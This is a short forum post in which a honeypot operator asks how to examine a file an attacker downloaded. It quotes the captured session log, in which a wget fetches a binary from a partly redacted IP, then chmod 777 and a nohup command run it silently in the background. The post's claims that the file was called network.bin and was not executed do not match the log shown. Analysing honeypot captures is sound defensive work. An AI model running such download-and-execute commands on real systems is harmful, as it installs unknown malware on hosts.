Forum Thread: Examining a *.Bin File

Hi Guys,

First post. Hope you are all well.

I set up a kippo honeypot a few days ago and got my first bite earlier today. The attacker immediately issued a wget command and downloaded a file called network.bin.

I was wondering what methods you would suggest in examining this file further? Is it possible to read the code safely and establish the purpose of the file?

Interestingly the attacker did not execute the file.

Thanks in advance,
Stevie

Step 1:

debian-server:~# wget http://xxx.xxx.xxx.208:1130/Manager
--2014-12-30 16:58:08-- http://xxx.xxx.xxx.208:1130/Manager
Connecting to xxx.xxx.xxx.208:1130... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1135000 (1M) application/octet-stream
Saving to: `Manager

25% ==========> 291,224 78K/s eta 10schmod 777 Manager
57% ======================> 656,643 82K/s eta 5snohup //root/Manager > /dev/null 2>&1 &
100%======================================> 1,135,000 83K/s eta 0s

2014-12-30 16:58:22 (83 KB/s) - `Manager' saved 1135000/1135000

Be the First to Respond

Share Your Thoughts

  • Hot
  • Active